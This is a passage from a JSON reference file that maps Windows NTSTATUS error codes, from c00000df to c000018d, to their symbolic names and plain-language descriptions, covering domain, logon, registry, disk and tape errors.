controller of the domain.\"\n        },\n        \"c00000df\": {\n            \"code\": \"STATUS_NO_SUCH_DOMAIN\",\n            \"description\": \"The specified domain did not exist.\"\n        },\n        \"c00000e0\": {\n            \"code\": \"STATUS_DOMAIN_EXISTS\",\n            \"description\": \"The specified domain already exists.\"\n        },\n        \"c00000e1\": {\n            \"code\": \"STATUS_DOMAIN_LIMIT_EXCEEDED\",\n            \"description\": \"An attempt was made to exceed the limit on the number of domains per server for this release.\"\n        },\n        \"c00000e2\": {\n            \"code\": \"STATUS_OPLOCK_NOT_GRANTED\",\n            \"description\": \"An error status returned when the opportunistic lock (oplock) request is denied.\"\n        },\n        \"c00000e3\": {\n            \"code\": \"STATUS_INVALID_OPLOCK_PROTOCOL\",\n            \"description\": \"An error status returned when an invalid opportunistic lock (oplock) acknowledgment is received by a file system.\"\n        },\n        \"c00000e4\": {\n            \"code\": \"STATUS_INTERNAL_DB_CORRUPTION\",\n            \"description\": \"This error indicates that the requested operation cannot be completed due to a catastrophic media failure or an on-disk data structure corruption.\"\n        },\n        \"c00000e5\": {\n            \"code\": \"STATUS_INTERNAL_ERROR\",\n            \"description\": \"An internal error occurred.\"\n        },\n        \"c00000e6\": {\n            \"code\": \"STATUS_GENERIC_NOT_MAPPED\",\n            \"description\": \"Indicates generic access types were contained in an access mask which should already be mapped to non-generic access types.\"\n        },\n        \"c00000e7\": {\n            \"code\": \"STATUS_BAD_DESCRIPTOR_FORMAT\",\n            \"description\": \"Indicates a security descriptor is not in the necessary format (absolute or self-relative).\"\n        },\n        \"c00000e8\": {\n            \"code\": \"STATUS_INVALID_USER_BUFFER\",\n            \"description\": \"An access to a user buffer failed at an expected point in time. This code is defined because the caller does not want to accept STATUS_ACCESS_VIOLATION in its filter.\"\n        },\n        \"c00000e9\": {\n            \"code\": \"STATUS_UNEXPECTED_IO_ERROR\",\n            \"description\": \"If an I/O error that is not defined in the standard FsRtl filter is returned, it is converted to the following error, which is guaranteed to be in the filter. In this case, information is lost; however, the filter correctly handles the exception.\"\n        },\n        \"c00000ea\": {\n            \"code\": \"STATUS_UNEXPECTED_MM_CREATE_ERR\",\n            \"description\": \"If an MM error that is not defined in the standard FsRtl filter is returned, it is converted to one of the following errors, which are guaranteed to be in the filter. In this case, information is lost; however, the filter correctly handles the exception.\"\n        },\n        \"c00000eb\": {\n            \"code\": \"STATUS_UNEXPECTED_MM_MAP_ERROR\",\n            \"description\": \"If an MM error that is not defined in the standard FsRtl filter is returned, it is converted to one of the following errors, which are guaranteed to be in the filter. In this case, information is lost; however, the filter correctly handles the exception.\"\n        },\n        \"c00000ec\": {\n            \"code\": \"STATUS_UNEXPECTED_MM_EXTEND_ERR\",\n            \"description\": \"If an MM error that is not defined in the standard FsRtl filter is returned, it is converted to one of the following errors, which are guaranteed to be in the filter. In this case, information is lost; however, the filter correctly handles the exception.\"\n        },\n        \"c00000ed\": {\n            \"code\": \"STATUS_NOT_LOGON_PROCESS\",\n            \"description\": \"The requested action is restricted for use by logon processes only. The calling process has not registered as a logon process.\"\n        },\n        \"c00000ee\": {\n            \"code\": \"STATUS_LOGON_SESSION_EXISTS\",\n            \"description\": \"An attempt has been made to start a new session manager or LSA logon session by using an ID that is already in use.\"\n        },\n        \"c00000ef\": {\n            \"code\": \"STATUS_INVALID_PARAMETER_1\",\n            \"description\": \"An invalid parameter was passed to a service or function as the first argument.\"\n        },\n        \"c00000f0\": {\n            \"code\": \"STATUS_INVALID_PARAMETER_2\",\n            \"description\": \"An invalid parameter was passed to a service or function as the second argument.\"\n        },\n        \"c00000f1\": {\n            \"code\": \"STATUS_INVALID_PARAMETER_3\",\n            \"description\": \"An invalid parameter was passed to a service or function as the third argument.\"\n        },\n        \"c00000f2\": {\n            \"code\": \"STATUS_INVALID_PARAMETER_4\",\n            \"description\": \"An invalid parameter was passed to a service or function as the fourth argument.\"\n        },\n        \"c00000f3\": {\n            \"code\": \"STATUS_INVALID_PARAMETER_5\",\n            \"description\": \"An invalid parameter was passed to a service or function as the fifth argument.\"\n        },\n        \"c00000f4\": {\n            \"code\": \"STATUS_INVALID_PARAMETER_6\",\n            \"description\": \"An invalid parameter was passed to a service or function as the sixth argument.\"\n        },\n        \"c00000f5\": {\n            \"code\": \"STATUS_INVALID_PARAMETER_7\",\n            \"description\": \"An invalid parameter was passed to a service or function as the seventh argument.\"\n        },\n        \"c00000f6\": {\n            \"code\": \"STATUS_INVALID_PARAMETER_8\",\n            \"description\": \"An invalid parameter was passed to a service or function as the eighth argument.\"\n        },\n        \"c00000f7\": {\n            \"code\": \"STATUS_INVALID_PARAMETER_9\",\n            \"description\": \"An invalid parameter was passed to a service or function as the ninth argument.\"\n        },\n        \"c00000f8\": {\n            \"code\": \"STATUS_INVALID_PARAMETER_10\",\n            \"description\": \"An invalid parameter was passed to a service or function as the tenth argument.\"\n        },\n        \"c00000f9\": {\n            \"code\": \"STATUS_INVALID_PARAMETER_11\",\n            \"description\": \"An invalid parameter was passed to a service or function as the eleventh argument.\"\n        },\n        \"c00000fa\": {\n            \"code\": \"STATUS_INVALID_PARAMETER_12\",\n            \"description\": \"An invalid parameter was passed to a service or function as the twelfth argument.\"\n        },\n        \"c00000fb\": {\n            \"code\": \"STATUS_REDIRECTOR_NOT_STARTED\",\n            \"description\": \"An attempt was made to access a network file, but the network software was not yet started.\"\n        },\n        \"c00000fc\": {\n            \"code\": \"STATUS_REDIRECTOR_STARTED\",\n            \"description\": \"An attempt was made to start the redirector, but the redirector has already been started.\"\n        },\n        \"c00000fd\": {\n            \"code\": \"STATUS_STACK_OVERFLOW\",\n            \"description\": \"A new guard page for the stack cannot be created.\"\n        },\n        \"c00000fe\": {\n            \"code\": \"STATUS_NO_SUCH_PACKAGE\",\n            \"description\": \"A specified authentication package is unknown.\"\n        },\n        \"c00000ff\": {\n            \"code\": \"STATUS_BAD_FUNCTION_TABLE\",\n            \"description\": \"A malformed function table was encountered during an unwind operation.\"\n        },\n        \"c0000100\": {\n            \"code\": \"STATUS_VARIABLE_NOT_FOUND\",\n            \"description\": \"Indicates the specified environment variable name was not found in the specified environment block.\"\n        },\n        \"c0000101\": {\n            \"code\": \"STATUS_DIRECTORY_NOT_EMPTY\",\n            \"description\": \"Indicates that the directory trying to be deleted is not empty.\"\n        },\n        \"c0000102\": {\n            \"code\": \"STATUS_FILE_CORRUPT_ERROR\",\n            \"description\": \"{Corrupt File} The file or directory %hs is corrupt and unreadable. Run the Chkdsk utility.\"\n        },\n        \"c0000103\": {\n            \"code\": \"STATUS_NOT_A_DIRECTORY\",\n            \"description\": \"A requested opened file is not a directory.\"\n        },\n        \"c0000104\": {\n            \"code\": \"STATUS_BAD_LOGON_SESSION_STATE\",\n            \"description\": \"The logon session is not in a state that is consistent with the requested operation.\"\n        },\n        \"c0000105\": {\n            \"code\": \"STATUS_LOGON_SESSION_COLLISION\",\n            \"description\": \"An internal LSA error has occurred. An authentication package has requested the creation of a logon session but the ID of an already existing logon session has been specified.\"\n        },\n        \"c0000106\": {\n            \"code\": \"STATUS_NAME_TOO_LONG\",\n            \"description\": \"A specified name string is too long for its intended use.\"\n        },\n        \"c0000107\": {\n            \"code\": \"STATUS_FILES_OPEN\",\n            \"description\": \"The user attempted to force close the files on a redirected drive, but there were opened files on the drive, and the user did not specify a sufficient level of force.\"\n        },\n        \"c0000108\": {\n            \"code\": \"STATUS_CONNECTION_IN_USE\",\n            \"description\": \"The user attempted to force close the files on a redirected drive, but there were opened directories on the drive, and the user did not specify a sufficient level of force.\"\n        },\n        \"c0000109\": {\n            \"code\": \"STATUS_MESSAGE_NOT_FOUND\",\n            \"description\": \"RtlFindMessage could not locate the requested message ID in the message table resource.\"\n        },\n        \"c000010a\": {\n            \"code\": \"STATUS_PROCESS_IS_TERMINATING\",\n            \"description\": \"An attempt was made to duplicate an object handle into or out of an exiting process.\"\n        },\n        \"c000010b\": {\n            \"code\": \"STATUS_INVALID_LOGON_TYPE\",\n            \"description\": \"Indicates an invalid value has been provided for the LogonType requested.\"\n        },\n        \"c000010c\": {\n            \"code\": \"STATUS_NO_GUID_TRANSLATION\",\n            \"description\": \"Indicates that an attempt was made to assign protection to a file system file or directory and one of the SIDs in the security descriptor could not be translated into a GUID that could be stored by the file system. This causes the protection attempt to fail, which might cause a file creation attempt to fail.\"\n        },\n        \"c000010d\": {\n            \"code\": \"STATUS_CANNOT_IMPERSONATE\",\n            \"description\": \"Indicates that an attempt has been made to impersonate via a named pipe that has not yet been read from.\"\n        },\n        \"c000010e\": {\n            \"code\": \"STATUS_IMAGE_ALREADY_LOADED\",\n            \"description\": \"Indicates that the specified image is already loaded.\"\n        },\n        \"c0000117\": {\n            \"code\": \"STATUS_NO_LDT\",\n            \"description\": \"Indicates that an attempt was made to change the size of the LDT for a process that has no LDT.\"\n        },\n        \"c0000118\": {\n            \"code\": \"STATUS_INVALID_LDT_SIZE\",\n            \"description\": \"Indicates that an attempt was made to grow an LDT by setting its size, or that the size was not an even number of selectors.\"\n        },\n        \"c0000119\": {\n            \"code\": \"STATUS_INVALID_LDT_OFFSET\",\n            \"description\": \"Indicates that the starting value for the LDT information was not an integral multiple of the selector size.\"\n        },\n        \"c000011a\": {\n            \"code\": \"STATUS_INVALID_LDT_DESCRIPTOR\",\n            \"description\": \"Indicates that the user supplied an invalid descriptor when trying to set up LDT descriptors.\"\n        },\n        \"c000011b\": {\n            \"code\": \"STATUS_INVALID_IMAGE_NE_FORMAT\",\n            \"description\": \"The specified image file did not have the correct format. It appears to be NE format.\"\n        },\n        \"c000011c\": {\n            \"code\": \"STATUS_RXACT_INVALID_STATE\",\n            \"description\": \"Indicates that the transaction state of a registry subtree is incompatible with the requested operation. For example, a request has been made to start a new transaction with one already in progress, or a request has been made to apply a transaction when one is not currently in progress.\"\n        },\n        \"c000011d\": {\n            \"code\": \"STATUS_RXACT_COMMIT_FAILURE\",\n            \"description\": \"Indicates an error has occurred during a registry transaction commit. The database has been left in an unknown, but probably inconsistent, state. The state of the registry transaction is left as COMMITTING.\"\n        },\n        \"c000011e\": {\n            \"code\": \"STATUS_MAPPED_FILE_SIZE_ZERO\",\n            \"description\": \"An attempt was made to map a file of size zero with the maximum size specified as zero.\"\n        },\n        \"c000011f\": {\n            \"code\": \"STATUS_TOO_MANY_OPENED_FILES\",\n            \"description\": \"Too many files are opened on a remote server. This error should only be returned by the Windows redirector on a remote drive.\"\n        },\n        \"c0000120\": {\n            \"code\": \"STATUS_CANCELLED\",\n            \"description\": \"The I/O request was canceled.\"\n        },\n        \"c0000121\": {\n            \"code\": \"STATUS_CANNOT_DELETE\",\n            \"description\": \"An attempt has been made to remove a file or directory that cannot be deleted.\"\n        },\n        \"c0000122\": {\n            \"code\": \"STATUS_INVALID_COMPUTER_NAME\",\n            \"description\": \"Indicates a name that was specified as a remote computer name is syntactically invalid.\"\n        },\n        \"c0000123\": {\n            \"code\": \"STATUS_FILE_DELETED\",\n            \"description\": \"An I/O request other than close was performed on a file after it was deleted, which can only happen to a request that did not complete before the last handle was closed via NtClose.\"\n        },\n        \"c0000124\": {\n            \"code\": \"STATUS_SPECIAL_ACCOUNT\",\n            \"description\": \"Indicates an operation that is incompatible with built-in accounts has been attempted on a built-in (special) SAM account. For example, built-in accounts cannot be deleted.\"\n        },\n        \"c0000125\": {\n            \"code\": \"STATUS_SPECIAL_GROUP\",\n            \"description\": \"The operation requested cannot be performed on the specified group because it is a built-in special group.\"\n        },\n        \"c0000126\": {\n            \"code\": \"STATUS_SPECIAL_USER\",\n            \"description\": \"The operation requested cannot be performed on the specified user because it is a built-in special user.\"\n        },\n        \"c0000127\": {\n            \"code\": \"STATUS_MEMBERS_PRIMARY_GROUP\",\n            \"description\": \"Indicates a member cannot be removed from a group because the group is currently the member's primary group.\"\n        },\n        \"c0000128\": {\n            \"code\": \"STATUS_FILE_CLOSED\",\n            \"description\": \"An I/O request other than close and several other special case operations was attempted using a file object that had already been closed.\"\n        },\n        \"c0000129\": {\n            \"code\": \"STATUS_TOO_MANY_THREADS\",\n            \"description\": \"Indicates a process has too many threads to perform the requested action. For example, assignment of a primary token can be performed only when a process has zero or one threads.\"\n        },\n        \"c000012a\": {\n            \"code\": \"STATUS_THREAD_NOT_IN_PROCESS\",\n            \"description\": \"An attempt was made to operate on a thread within a specific process, but the specified thread is not in the specified process.\"\n        },\n        \"c000012b\": {\n            \"code\": \"STATUS_TOKEN_ALREADY_IN_USE\",\n            \"description\": \"An attempt was made to establish a token for use as a primary token but the token is already in use. A token can only be the primary token of one process at a time.\"\n        },\n        \"c000012c\": {\n            \"code\": \"STATUS_PAGEFILE_QUOTA_EXCEEDED\",\n            \"description\": \"The page file quota was exceeded.\"\n        },\n        \"c000012d\": {\n            \"code\": \"STATUS_COMMITMENT_LIMIT\",\n            \"description\": \"{Out of Virtual Memory} Your system is low on virtual memory. To ensure that Windows runs correctly, increase the size of your virtual memory paging file. For more information, see Help.\"\n        },\n        \"c000012e\": {\n            \"code\": \"STATUS_INVALID_IMAGE_LE_FORMAT\",\n            \"description\": \"The specified image file did not have the correct format: it appears to be LE format.\"\n        },\n        \"c000012f\": {\n            \"code\": \"STATUS_INVALID_IMAGE_NOT_MZ\",\n            \"description\": \"The specified image file did not have the correct format: it did not have an initial MZ.\"\n        },\n        \"c0000130\": {\n            \"code\": \"STATUS_INVALID_IMAGE_PROTECT\",\n            \"description\": \"The specified image file did not have the correct format: it did not have a proper e_lfarlc in the MZ header.\"\n        },\n        \"c0000131\": {\n            \"code\": \"STATUS_INVALID_IMAGE_WIN_16\",\n            \"description\": \"The specified image file did not have the correct format: it appears to be a 16-bit Windows image.\"\n        },\n        \"c0000132\": {\n            \"code\": \"STATUS_LOGON_SERVER_CONFLICT\",\n            \"description\": \"The Netlogon service cannot start because another Netlogon service running in the domain conflicts with the specified role.\"\n        },\n        \"c0000133\": {\n            \"code\": \"STATUS_TIME_DIFFERENCE_AT_DC\",\n            \"description\": \"The time at the primary domain controller is different from the time at the backup domain controller or member server by too large an amount.\"\n        },\n        \"c0000134\": {\n            \"code\": \"STATUS_SYNCHRONIZATION_REQUIRED\",\n            \"description\": \"On applicable Windows Server releases, the SAM database is significantly out of synchronization with the copy on the domain controller. A complete synchronization is required.\"\n        },\n        \"c0000135\": {\n            \"code\": \"STATUS_DLL_NOT_FOUND\",\n            \"description\": \"{Unable To Locate Component} This application has failed to start because %hs was not found. Reinstalling the application might fix this problem.\"\n        },\n        \"c0000136\": {\n            \"code\": \"STATUS_OPEN_FAILED\",\n            \"description\": \"The NtCreateFile API failed. This error should never be returned to an application; it is a place holder for the Windows LAN Manager Redirector to use in its internal error-mapping routines.\"\n        },\n        \"c0000137\": {\n            \"code\": \"STATUS_IO_PRIVILEGE_FAILED\",\n            \"description\": \"{Privilege Failed} The I/O permissions for the process could not be changed.\"\n        },\n        \"c0000138\": {\n            \"code\": \"STATUS_ORDINAL_NOT_FOUND\",\n            \"description\": \"{Ordinal Not Found} The ordinal %ld could not be located in the dynamic link library %hs.\"\n        },\n        \"c0000139\": {\n            \"code\": \"STATUS_ENTRYPOINT_NOT_FOUND\",\n            \"description\": \"{Entry Point Not Found} The procedure entry point %hs could not be located in the dynamic link library %hs.\"\n        },\n        \"c000013a\": {\n            \"code\": \"STATUS_CONTROL_C_EXIT\",\n            \"description\": \"{Application Exit by CTRL+C} The application terminated as a result of a CTRL+C.\"\n        },\n        \"c000013b\": {\n            \"code\": \"STATUS_LOCAL_DISCONNECT\",\n            \"description\": \"{Virtual Circuit Closed} The network transport on your computer has closed a network connection. There might or might not be I/O requests outstanding.\"\n        },\n        \"c000013c\": {\n            \"code\": \"STATUS_REMOTE_DISCONNECT\",\n            \"description\": \"{Virtual Circuit Closed} The network transport on a remote computer has closed a network connection. There might or might not be I/O requests outstanding.\"\n        },\n        \"c000013d\": {\n            \"code\": \"STATUS_REMOTE_RESOURCES\",\n            \"description\": \"{Insufficient Resources on Remote Computer} The remote computer has insufficient resources to complete the network request. For example, the remote computer might not have enough available memory to carry out the request at this time.\"\n        },\n        \"c000013e\": {\n            \"code\": \"STATUS_LINK_FAILED\",\n            \"description\": \"{Virtual Circuit Closed} An existing connection (virtual circuit) has been broken at the remote computer. There is probably something wrong with the network software protocol or the network hardware on the remote computer.\"\n        },\n        \"c000013f\": {\n            \"code\": \"STATUS_LINK_TIMEOUT\",\n            \"description\": \"{Virtual Circuit Closed} The network transport on your computer has closed a network connection because it had to wait too long for a response from the remote computer.\"\n        },\n        \"c0000140\": {\n            \"code\": \"STATUS_INVALID_CONNECTION\",\n            \"description\": \"The connection handle that was given to the transport was invalid.\"\n        },\n        \"c0000141\": {\n            \"code\": \"STATUS_INVALID_ADDRESS\",\n            \"description\": \"The address handle that was given to the transport was invalid.\"\n        },\n        \"c0000142\": {\n            \"code\": \"STATUS_DLL_INIT_FAILED\",\n            \"description\": \"{DLL Initialization Failed} Initialization of the dynamic link library %hs failed. The process is terminating abnormally.\"\n        },\n        \"c0000143\": {\n            \"code\": \"STATUS_MISSING_SYSTEMFILE\",\n            \"description\": \"{Missing System File} The required system file %hs is bad or missing.\"\n        },\n        \"c0000144\": {\n            \"code\": \"STATUS_UNHANDLED_EXCEPTION\",\n            \"description\": \"{Application Error} The exception %s (0x%08lx) occurred in the application at location 0x%08lx.\"\n        },\n        \"c0000145\": {\n            \"code\": \"STATUS_APP_INIT_FAILURE\",\n            \"description\": \"{Application Error} The application failed to initialize properly (0x%lx). Click OK to terminate the application.\"\n        },\n        \"c0000146\": {\n            \"code\": \"STATUS_PAGEFILE_CREATE_FAILED\",\n            \"description\": \"{Unable to Create Paging File} The creation of the paging file %hs failed (%lx). The requested size was %ld.\"\n        },\n        \"c0000147\": {\n            \"code\": \"STATUS_NO_PAGEFILE\",\n            \"description\": \"{No Paging File Specified} No paging file was specified in the system configuration.\"\n        },\n        \"c0000148\": {\n            \"code\": \"STATUS_INVALID_LEVEL\",\n            \"description\": \"{Incorrect System Call Level} An invalid level was passed into the specified system call.\"\n        },\n        \"c0000149\": {\n            \"code\": \"STATUS_WRONG_PASSWORD_CORE\",\n            \"description\": \"{Incorrect Password to LAN Manager Server} You specified an incorrect password to a LAN Manager 2.x or MS-NET server.\"\n        },\n        \"c000014a\": {\n            \"code\": \"STATUS_ILLEGAL_FLOAT_CONTEXT\",\n            \"description\": \"{EXCEPTION} A real-mode application issued a floating-point instruction and floating-point hardware is not present.\"\n        },\n        \"c000014b\": {\n            \"code\": \"STATUS_PIPE_BROKEN\",\n            \"description\": \"The pipe operation has failed because the other end of the pipe has been closed.\"\n        },\n        \"c000014c\": {\n            \"code\": \"STATUS_REGISTRY_CORRUPT\",\n            \"description\": \"{The Registry Is Corrupt} The structure of one of the files that contains registry data is corrupt; the image of the file in memory is corrupt; or the file could not be recovered because the alternate copy or log was absent or corrupt.\"\n        },\n        \"c000014d\": {\n            \"code\": \"STATUS_REGISTRY_IO_FAILED\",\n            \"description\": \"An I/O operation initiated by the Registry failed and cannot be recovered. The registry could not read in, write out, or flush one of the files that contain the system's image of the registry.\"\n        },\n        \"c000014e\": {\n            \"code\": \"STATUS_NO_EVENT_PAIR\",\n            \"description\": \"An event pair synchronization operation was performed using the thread-specific client/server event pair object, but no event pair object was associated with the thread.\"\n        },\n        \"c000014f\": {\n            \"code\": \"STATUS_UNRECOGNIZED_VOLUME\",\n            \"description\": \"The volume does not contain a recognized file system. Be sure that all required file system drivers are loaded and that the volume is not corrupt.\"\n        },\n        \"c0000150\": {\n            \"code\": \"STATUS_SERIAL_NO_DEVICE_INITED\",\n            \"description\": \"No serial device was successfully initialized. The serial driver will unload.\"\n        },\n        \"c0000151\": {\n            \"code\": \"STATUS_NO_SUCH_ALIAS\",\n            \"description\": \"The specified local group does not exist.\"\n        },\n        \"c0000152\": {\n            \"code\": \"STATUS_MEMBER_NOT_IN_ALIAS\",\n            \"description\": \"The specified account name is not a member of the group.\"\n        },\n        \"c0000153\": {\n            \"code\": \"STATUS_MEMBER_IN_ALIAS\",\n            \"description\": \"The specified account name is already a member of the group.\"\n        },\n        \"c0000154\": {\n            \"code\": \"STATUS_ALIAS_EXISTS\",\n            \"description\": \"The specified local group already exists.\"\n        },\n        \"c0000155\": {\n            \"code\": \"STATUS_LOGON_NOT_GRANTED\",\n            \"description\": \"A requested type of logon (for example, interactive, network, and service) is not granted by the local security policy of the target system. Ask the system administrator to grant the necessary form of logon.\"\n        },\n        \"c0000156\": {\n            \"code\": \"STATUS_TOO_MANY_SECRETS\",\n            \"description\": \"The maximum number of secrets that can be stored in a single system was exceeded. The length and number of secrets is limited to satisfy U.S. State Department export restrictions.\"\n        },\n        \"c0000157\": {\n            \"code\": \"STATUS_SECRET_TOO_LONG\",\n            \"description\": \"The length of a secret exceeds the maximum allowable length. The length and number of secrets is limited to satisfy U.S. State Department export restrictions.\"\n        },\n        \"c0000158\": {\n            \"code\": \"STATUS_INTERNAL_DB_ERROR\",\n            \"description\": \"The local security authority (LSA) database contains an internal inconsistency.\"\n        },\n        \"c0000159\": {\n            \"code\": \"STATUS_FULLSCREEN_MODE\",\n            \"description\": \"The requested operation cannot be performed in full-screen mode.\"\n        },\n        \"c000015a\": {\n            \"code\": \"STATUS_TOO_MANY_CONTEXT_IDS\",\n            \"description\": \"During a logon attempt, the user's security context accumulated too many security IDs. This is a very unusual situation. Remove the user from some global or local groups to reduce the number of security IDs to incorporate into the security context.\"\n        },\n        \"c000015b\": {\n            \"code\": \"STATUS_LOGON_TYPE_NOT_GRANTED\",\n            \"description\": \"A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who can logon interactively and through the network.\"\n        },\n        \"c000015c\": {\n            \"code\": \"STATUS_NOT_REGISTRY_FILE\",\n            \"description\": \"The system has attempted to load or restore a file into the registry, and the specified file is not in the format of a registry file.\"\n        },\n        \"c000015d\": {\n            \"code\": \"STATUS_NT_CROSS_ENCRYPTION_REQUIRED\",\n            \"description\": \"An attempt was made to change a user password in the security account manager without providing the necessary Windows cross-encrypted password.\"\n        },\n        \"c000015e\": {\n            \"code\": \"STATUS_DOMAIN_CTRLR_CONFIG_ERROR\",\n            \"description\": \"A domain server has an incorrect configuration.\"\n        },\n        \"c000015f\": {\n            \"code\": \"STATUS_FT_MISSING_MEMBER\",\n            \"description\": \"An attempt was made to explicitly access the secondary copy of information via a device control to the fault tolerance driver and the secondary copy is not present in the system.\"\n        },\n        \"c0000160\": {\n            \"code\": \"STATUS_ILL_FORMED_SERVICE_ENTRY\",\n            \"description\": \"A configuration registry node that represents a driver service entry was ill-formed and did not contain the required value entries.\"\n        },\n        \"c0000161\": {\n            \"code\": \"STATUS_ILLEGAL_CHARACTER\",\n            \"description\": \"An illegal character was encountered. For a multibyte character set, this includes a lead byte without a succeeding trail byte. For the Unicode character set this includes the characters 0xFFFF and 0xFFFE.\"\n        },\n        \"c0000162\": {\n            \"code\": \"STATUS_UNMAPPABLE_CHARACTER\",\n            \"description\": \"No mapping for the Unicode character exists in the target multibyte code page.\"\n        },\n        \"c0000163\": {\n            \"code\": \"STATUS_UNDEFINED_CHARACTER\",\n            \"description\": \"The Unicode character is not defined in the Unicode character set that is installed on the system.\"\n        },\n        \"c0000164\": {\n            \"code\": \"STATUS_FLOPPY_VOLUME\",\n            \"description\": \"The paging file cannot be created on a floppy disk.\"\n        },\n        \"c0000165\": {\n            \"code\": \"STATUS_FLOPPY_ID_MARK_NOT_FOUND\",\n            \"description\": \"{Floppy Disk Error} While accessing a floppy disk, an ID address mark was not found.\"\n        },\n        \"c0000166\": {\n            \"code\": \"STATUS_FLOPPY_WRONG_CYLINDER\",\n            \"description\": \"{Floppy Disk Error} While accessing a floppy disk, the track address from the sector ID field was found to be different from the track address that is maintained by the controller.\"\n        },\n        \"c0000167\": {\n            \"code\": \"STATUS_FLOPPY_UNKNOWN_ERROR\",\n            \"description\": \"{Floppy Disk Error} The floppy disk controller reported an error that is not recognized by the floppy disk driver.\"\n        },\n        \"c0000168\": {\n            \"code\": \"STATUS_FLOPPY_BAD_REGISTERS\",\n            \"description\": \"{Floppy Disk Error} While accessing a floppy-disk, the controller returned inconsistent results via its registers.\"\n        },\n        \"c0000169\": {\n            \"code\": \"STATUS_DISK_RECALIBRATE_FAILED\",\n            \"description\": \"{Hard Disk Error} While accessing the hard disk, a recalibrate operation failed, even after retries.\"\n        },\n        \"c000016a\": {\n            \"code\": \"STATUS_DISK_OPERATION_FAILED\",\n            \"description\": \"{Hard Disk Error} While accessing the hard disk, a disk operation failed even after retries.\"\n        },\n        \"c000016b\": {\n            \"code\": \"STATUS_DISK_RESET_FAILED\",\n            \"description\": \"{Hard Disk Error} While accessing the hard disk, a disk controller reset was needed, but even that failed.\"\n        },\n        \"c000016c\": {\n            \"code\": \"STATUS_SHARED_IRQ_BUSY\",\n            \"description\": \"An attempt was made to open a device that was sharing an interrupt request (IRQ) with other devices. At least one other device that uses that IRQ was already opened. Two concurrent opens of devices that share an IRQ and only work via interrupts is not supported for the particular bus type that the devices use.\"\n        },\n        \"c000016d\": {\n            \"code\": \"STATUS_FT_ORPHANING\",\n            \"description\": \"{FT Orphaning} A disk that is part of a fault-tolerant volume can no longer be accessed.\"\n        },\n        \"c000016e\": {\n            \"code\": \"STATUS_BIOS_FAILED_TO_CONNECT_INTERRUPT\",\n            \"description\": \"The basic input/output system (BIOS) failed to connect a system interrupt to the device or bus for which the device is connected.\"\n        },\n        \"c0000172\": {\n            \"code\": \"STATUS_PARTITION_FAILURE\",\n            \"description\": \"The tape could not be partitioned.\"\n        },\n        \"c0000173\": {\n            \"code\": \"STATUS_INVALID_BLOCK_LENGTH\",\n            \"description\": \"When accessing a new tape of a multi-volume partition, the current blocksize is incorrect.\"\n        },\n        \"c0000174\": {\n            \"code\": \"STATUS_DEVICE_NOT_PARTITIONED\",\n            \"description\": \"The tape partition information could not be found when loading a tape.\"\n        },\n        \"c0000175\": {\n            \"code\": \"STATUS_UNABLE_TO_LOCK_MEDIA\",\n            \"description\": \"An attempt to lock the eject media mechanism failed.\"\n        },\n        \"c0000176\": {\n            \"code\": \"STATUS_UNABLE_TO_UNLOAD_MEDIA\",\n            \"description\": \"An attempt to unload media failed.\"\n        },\n        \"c0000177\": {\n            \"code\": \"STATUS_EOM_OVERFLOW\",\n            \"description\": \"The physical end of tape was detected.\"\n        },\n        \"c0000178\": {\n            \"code\": \"STATUS_NO_MEDIA\",\n            \"description\": \"{No Media} There is no media in the drive. Insert media into drive %hs.\"\n        },\n        \"c000017a\": {\n            \"code\": \"STATUS_NO_SUCH_MEMBER\",\n            \"description\": \"A member could not be added to or removed from the local group because the member does not exist.\"\n        },\n        \"c000017b\": {\n            \"code\": \"STATUS_INVALID_MEMBER\",\n            \"description\": \"A new member could not be added to a local group because the member has the wrong account type.\"\n        },\n        \"c000017c\": {\n            \"code\": \"STATUS_KEY_DELETED\",\n            \"description\": \"An illegal operation was attempted on a registry key that has been marked for deletion.\"\n        },\n        \"c000017d\": {\n            \"code\": \"STATUS_NO_LOG_SPACE\",\n            \"description\": \"The system could not allocate the required space in a registry log.\"\n        },\n        \"c000017e\": {\n            \"code\": \"STATUS_TOO_MANY_SIDS\",\n            \"description\": \"Too many SIDs have been specified.\"\n        },\n        \"c000017f\": {\n            \"code\": \"STATUS_LM_CROSS_ENCRYPTION_REQUIRED\",\n            \"description\": \"An attempt was made to change a user password in the security account manager without providing the necessary LM cross-encrypted password.\"\n        },\n        \"c0000180\": {\n            \"code\": \"STATUS_KEY_HAS_CHILDREN\",\n            \"description\": \"An attempt was made to create a symbolic link in a registry key that already has subkeys or values.\"\n        },\n        \"c0000181\": {\n            \"code\": \"STATUS_CHILD_MUST_BE_VOLATILE\",\n            \"description\": \"An attempt was made to create a stable subkey under a volatile parent key.\"\n        },\n        \"c0000182\": {\n            \"code\": \"STATUS_DEVICE_CONFIGURATION_ERROR\",\n            \"description\": \"The I/O device is configured incorrectly or the configuration parameters to the driver are incorrect.\"\n        },\n        \"c0000183\": {\n            \"code\": \"STATUS_DRIVER_INTERNAL_ERROR\",\n            \"description\": \"An error was detected between two drivers or within an I/O driver.\"\n        },\n        \"c0000184\": {\n            \"code\": \"STATUS_INVALID_DEVICE_STATE\",\n            \"description\": \"The device is not in a valid state to perform this request.\"\n        },\n        \"c0000185\": {\n            \"code\": \"STATUS_IO_DEVICE_ERROR\",\n            \"description\": \"The I/O device reported an I/O error.\"\n        },\n        \"c0000186\": {\n            \"code\": \"STATUS_DEVICE_PROTOCOL_ERROR\",\n            \"description\": \"A protocol error was detected between the driver and the device.\"\n        },\n        \"c0000187\": {\n            \"code\": \"STATUS_BACKUP_CONTROLLER\",\n            \"description\": \"This operation is only allowed for the primary domain controller of the domain.\"\n        },\n        \"c0000188\": {\n            \"code\": \"STATUS_LOG_FILE_FULL\",\n            \"description\": \"The log file space is insufficient to support this operation.\"\n        },\n        \"c0000189\": {\n            \"code\": \"STATUS_TOO_LATE\",\n            \"description\": \"A write operation was attempted to a volume after it was dismounted.\"\n        },\n        \"c000018a\": {\n            \"code\": \"STATUS_NO_TRUST_LSA_SECRET\",\n            \"description\": \"The workstation does not have a trust secret for the primary domain in the local LSA database.\"\n        },\n        \"c000018b\": {\n            \"code\": \"STATUS_NO_TRUST_SAM_ACCOUNT\",\n            \"description\": \"On applicable Windows Server releases, the SAM database does not have a computer account for this workstation trust relationship.\"\n        },\n        \"c000018c\": {\n            \"code\": \"STATUS_TRUSTED_DOMAIN_FAILURE\",\n            \"description\": \"The logon request failed because the trust relationship between the primary domain and the trusted domain failed.\"\n        },\n        \"c000018d\": {\n            \"code\": \"STATUS_TRUSTED_RELATIONSHIP_FAILURE\",\n            \"description\": \"The logon request failed because the trust relationship between this workstation and the primary domain failed.\"\n        